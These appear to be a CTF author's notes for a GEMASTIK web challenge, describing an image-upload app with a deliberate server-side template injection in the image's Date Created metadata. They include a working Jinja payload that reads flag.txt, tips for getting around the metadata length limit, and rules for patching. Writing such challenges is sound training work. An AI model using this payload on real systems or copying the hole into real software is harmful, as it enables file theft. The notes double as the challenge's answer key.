## CDN db used: sqlite flag.txt: GEMASTIK{random sha256 generated on app start} ### feature: [authentication required with login and register, register default as "user" role] 1. upload image ### Vulns #### vuln1: SSTI on image Date Created metadata, exiftool cant insert this, need to write the image's blob example: ```bash (base) jons@01-20-jonathanmarbun:/mnt/c/1Jonathan/CTFS/gawe/gms25/web2/exploit$ exiftool -overwrite_original -IPTC:DateCreated="{{7*7}}" image.png Warning: Invalid date format (use YYYY:mm:dd) in IPTC:DateCreated (ValueConvInv) Nothing to do. ``` payload to inject: ```{{lipsum.__builtins__['open']('flag.txt').read()}}``` when editing the Date Created metadata manually, somehow it has limit of 46 char (but we can expand that to make it more by deleting the content of another metadata) -> check ssti.png it probably have different behavior on another image file or format payload: check exploit/exp3.py #### vuln2: ### Patching Rule? - dont remove flag.txt/changes its content - ensure image metadata generation still available - ensure exiftool still used